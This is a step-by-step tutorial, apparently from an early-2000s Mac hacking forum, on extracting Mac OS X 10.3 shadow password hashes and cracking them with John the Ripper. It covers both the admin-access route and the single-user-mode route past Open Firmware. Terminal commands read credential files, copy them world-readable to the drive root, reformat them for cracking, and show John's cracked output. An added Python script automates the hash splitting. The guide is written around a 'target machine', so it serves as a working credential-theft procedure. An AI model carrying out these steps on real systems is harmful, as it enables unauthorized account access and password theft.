Recovering Lost Passwords
If you already have admin level access to the target machine, this is where you want to start. If you don't have admin level access, you'll need to read the next section.
- Open Terminal.
- "sudo -s"
- Enter your admin password.
- "cd /var/db/shadow/hash"
To list the available accounts and their hash files:
- "nireport . /users name generateduid"
You can also use "niutil -readprop . /users/<name> generateduid" to get the hash file for a specific account (in case there are dozens of accounts). Just replace <name> with the account name (don't type the <>'s).
Continuing, for each hash file you want:
- "cp <file_name> /;chmod 777 /<file_name>"
Where <file_name> is the name of the file. Do not type the <>'s.
There will now be a file in the top directory of the boot drive for each hash file you copied. Each file will contain the unformatted hash string for the user it belongs to.
Example: Target Username is "nopass"
Last login: Mon Dec 6 02:23:50 on ttyp1
Welcome to Darwin!
localhost:~ hacken$ sudo -s
Password:
localhost:~ root# cd /var/db/shadow/hash
localhost:/var/db/shadow/hash root# niutil -readprop . /users/nopass generateduid
DFA70914-476E-11D9-B6BE-000D936D686E
localhost:/var/db/shadow/hash root# cp DFA7*686E /;chmod 777 /DFA7*686E
localhost:/var/db/shadow/hash root#
File name matching and wildcards: If you have a file with a long name you don't want to type, use a wildcard. An asterisk means "any number of characters" and a question mark means "any single character." But you have to be sure that the pattern matches only the file(s) you want. It's therefore a good idea to use both the first few characters and the last few characters of the file name.
Recovering Your Admin Password
This chapter assumes the Open Firmware security-mode is set to none (or that you know the password). If Open Firmware protection is enabled, you'll need to disable it. My article GettingSUM covers this. If you have any trouble with this, use Google to find more information.
- Reboot and hold cmd-s.
If it doesn't give you a black screen with white text, reread the above paragraph.
When the text stops at a '#' character, run the following:
- "mount -uaw"
- "/usr/libexec/register_mach_bootstrap_servers /etc/mach_init.d"
- "cd /var/db/netinfo; netinfod -s local"
- "SystemStarter"
- "cd /var/db/shadow/hash"
- "nireport . /users name generateduid"
This will dump out a list of all the users, along with their generateduid. If there are too many to look through, or the one you want scrolls off the screen, you can also use "niutil -readprop . /users/<name> generateduid" to get the hash file for a specific account. Just replace <name> with the account name (don't type the <>'s).
Continuing, for each file not ending in .save or .state:
- "cp <file_name> /;chmod 777 /<file_name>"
Where <file_name> is the name of the file. Do not type the <>'s.
- "exit" or "logout" or "reboot"
Once the machine is finished booting, log in if you need to. The hash file can be found in the top directory of the boot drive. It can be opened with any text editor for the necessary changes; you may need to use "Open with..." from the control-click contextual menu.
Crack the Hash File
Once you've managed to get the hash file out of the /hash directory and onto the top level of the hard disk, you need to format it for cracking. The format you use depends on which crackers you have available. If you have a default John the Ripper 1.6, follow the first set of instructions. If you have lcrack, or a patched John (to handle SHA1), follow the second set of instructions.
Set One: NTLM
- Open the hash file in a text editor.
- Put the insertion bar at the beginning of the line and type a colon.
- Tap the right arrow over, counting 32 characters of the hash, and type a colon.
- Repeat.
- Delete the remaining 40 characters, and put two more colons (for a total of three at the end).
- Save the file (you may wish to rename it).
You now have a NTLM hash file ready for cracking.
You can run this hash file through John the Ripper. John will report having loaded two passwords. When John has cracked a password, it will let you know. Once all the passwords have been cracked, John will print a line and exit. Please note, the passwords will be returned in all uppercase, and in the order they were cracked. You'll have to put them back in the correct order (they will be identified), and then guess at the capitalization.
Warning
You will not know the capitalization of the letters in the original password. You must try the different capitalizations. I suggest starting with all lowercase, then all uppercase, then alternating capitalization.
Set Two: SHA1
- Open the hash file in a text editor.
- Put the insertion bar at the end of the line (the right side).
- Tap the left arrow over forty characters of the hash.
- Delete the beginning 64 characters (keeping the last forty).
- Type a colon (so the line begins with a colon).
- Save the file (rename it if you want to).
You now have a SHA1 hash file ready for cracking.
You can now run this hash through John, as long as you have applied the SHA1 patch, or through lcrack, or macKrack, instead.
Why one or the other? Well, NTLM hashes are easy to crack, but don't give you the capitalization. SHA1 hashes are much harder to crack, but give you the exact password. The choice between the two is up to you, and limited by your resources. If you need the exact password, you'll want SHA1, but it might help to crack the NTLM first and try with all lowercase. Plus, cracking NTLM tells you what characters the password has, and in what order, thus greatly limiting the character space.
Example of NTLM
Username: newbie Password: password
/ root# cd /var/db/shadow/hash
/var/db/shadow/hash root# niutil -readprop . /users/newbie generateduid
6276A972-4777-11D9-AF9A-000D936D686E
/var/db/shadow/hash root# cp 62*6E /;chmod 777 /62*6E
/var/db/shadow/hash root# exit
Edit the file, and save it where it can be cracked.
localhost:~ hacken$ /Applications/john-1.6/run/john /62*6E
Loaded 2 passwords with no different salts (NT LM DES [24/32 4K])
PASSWOR (:1)
D (:2)
guesses: 2 time: 0:00:00:00 100% (2) c/s: 50882 trying: D - A
localhost:/var/db/shadow/hash root#
NTLM passwords are padded or truncated to 14 characters (depending how long they actually are), then broken into two 7-character passwords. In this case, the password ("password") is eight characters, so the last one gets separated. After reconstructing the password, we have "PASSWORD". The "(:1)" and "(:2)" mean first and second sections. Notice it is given here in all capitals. This is how passwords are hashed for NTLM. You will have to guess at the capitalization.
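Counting 32 and 40 characters by hand in a text editor is error-prone, so here is an added Python helper (my own code, not from the article or any tool it mentions) that checks a copied hash line really has the 32 + 32 + 40 hex-character layout described above, emits the Set One and Set Two lines, and puts John's "(:1)"/"(:2)" halves back in order; the sample hash line and John output are constructed, not real values.

```python
import re

# Field layout of a Mac OS X 10.3 shadow hash line as the article describes it:
# 32 hex chars (LM), 32 hex chars (NT), 40 hex chars (SHA-1) = 104 chars total.
LM_LEN, NT_LEN, SHA1_LEN = 32, 32, 40
LINE_LEN = LM_LEN + NT_LEN + SHA1_LEN

def split_hash_line(line: str) -> dict:
    """Validate one hash line and return its three fields.
    Anything that is not exactly 104 hex characters is not the plain hash line
    the article works with, so refuse it rather than slice at wrong offsets."""
    s = line.strip()
    if len(s) != LINE_LEN or not re.fullmatch(r"[0-9A-Fa-f]+", s):
        raise ValueError(f"expected {LINE_LEN} hex chars, got {len(s)}")
    return {"lm": s[:LM_LEN],
            "nt": s[LM_LEN:LM_LEN + NT_LEN],
            "sha1": s[LM_LEN + NT_LEN:]}

def format_set_one(fields: dict) -> str:
    """Set One: leading colon, LM, colon, NT, then three trailing colons."""
    return f":{fields['lm']}:{fields['nt']}:::"

def format_set_two(fields: dict) -> str:
    """Set Two: drop the first 64 characters, keep the SHA-1, prefix a colon."""
    return f":{fields['sha1']}"

def reassemble_lm_halves(john_lines) -> str:
    """Rebuild the LM plaintext from John's 'HALF (:1)' / 'HALF (:2)' lines.
    John prints halves in the order it cracked them, so order by section
    number. The result is uppercase because LM upcases before hashing."""
    halves = {}
    for ln in john_lines:
        m = re.match(r"^(.*) \(:(\d)\)$", ln.rstrip("\n"))
        if m:
            halves[int(m.group(2))] = m.group(1)
    return "".join(halves[k] for k in sorted(halves))

# Constructed sample input (not real hashes or output from the article):
SAMPLE_LINE = "0123456789abcdef" * 2 + "fedcba9876543210" * 2 + "deadbeef" * 5
SAMPLE_JOHN_OUTPUT = ["D (:2)", "PASSWOR (:1)"]  # halves deliberately out of order

if __name__ == "__main__":
    f = split_hash_line(SAMPLE_LINE)
    print(format_set_one(f))
    print(format_set_two(f))
    print(reassemble_lm_halves(SAMPLE_JOHN_OUTPUT))
```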
Notes
- When dealing with awkward file names (e.g. "87386AS-DFG3-284765-SDJHFG"), you can use an * to represent "a number of characters" (e.g. "8*G"), but don't be ambiguous:
localhost:~ hacken$ ls -a
. some file
.. some other file
.DS_Store someone's really important file
localhost:~ hacken$ rm some*file
localhost:~ hacken$ ls -a
. .. .DS_Store
localhost:~ hacken$ Oops, someone's really important file was deleted.
- Cracked 10.3 passwords will be shown in all uppercase. You will not know the actual capitalization.
History
Dec 1, 2004:
- Wrote initial draft, and the first copy.
- Posted on Mac Underground.
Dec 2, 2004:
- Added History. Removed Chapter 1, step 8.
- Changed Chapter 2, step 5 to include "reboot".
- Added to Chapter 2, step 1.
- Reworded the Conclusion slightly.
- Added Hint 3.
- Shortened Hint 2.
Dec 2, 2004, PM:
- Added the note about capitalization in the Conclusion.
Dec 3, 2004:
- Added a few more notes about the capitalization.
Dec 4, 2004:
- Re-wrote as an HTML file.
- Re-wrote Chapter 1, removing instructions pertaining to john.
- Re-wrote Chapters 1 and 2, putting the chmod instructions into chapter 3.
- Character width has been increased to about 90, because that's about how wide the Appendix A table is.
- We are no longer assuming there is a compiled john available, and SUM instructions have been added.
- Moved the Hints to the bottom.
Dec 5, 2004:
- Included new info about niutil.
- Gave an example in chapter 1.
- Moved the example from Appendix A into Chapter 2.
- Removed Appendix A.
- Ended up removing the Example anyway, until I can make a good one specific to SUM.
- Removed forced line ending, and recommended character width. The table widths keep changing, so I don't care about it anymore. I can always force the page width in the first <td> tag.
- Removed a lot of <pre> tags, to let the browsers handle line wrapping.
Dec 10, 2004:
- Added SHA1 hash instructions in Chapter 4. But, it doesn't seem to work right.
- Cleaned up the appendixes.
- Cleaned up the history.
Dec 11, 2004:
- Since I re-wrote GettingSUM, I changed Chapter 3 appropriately.
- I also changed its subtitle from "OF anti-SUM", which was a place-holder anyway.
- Fixed capitalization in subtitles.
- Fixed the "Conclusion" section, which is actually the "Examples" section.
Dec 12, 2004:
- Changed niutil to nireport in Chapter 1.
Jul 7, 2005:
- Updated some sections to reference other articles.
- Corrected errors in the Hints section.
- Added highlighting to terminal commands.
Jul 12, 2005:
- Removed references to fsck, as this is a 10.3 guide.
- Clarified step 7 of Chapter 2.
Mar 21, 2006:
- Reformatted the page.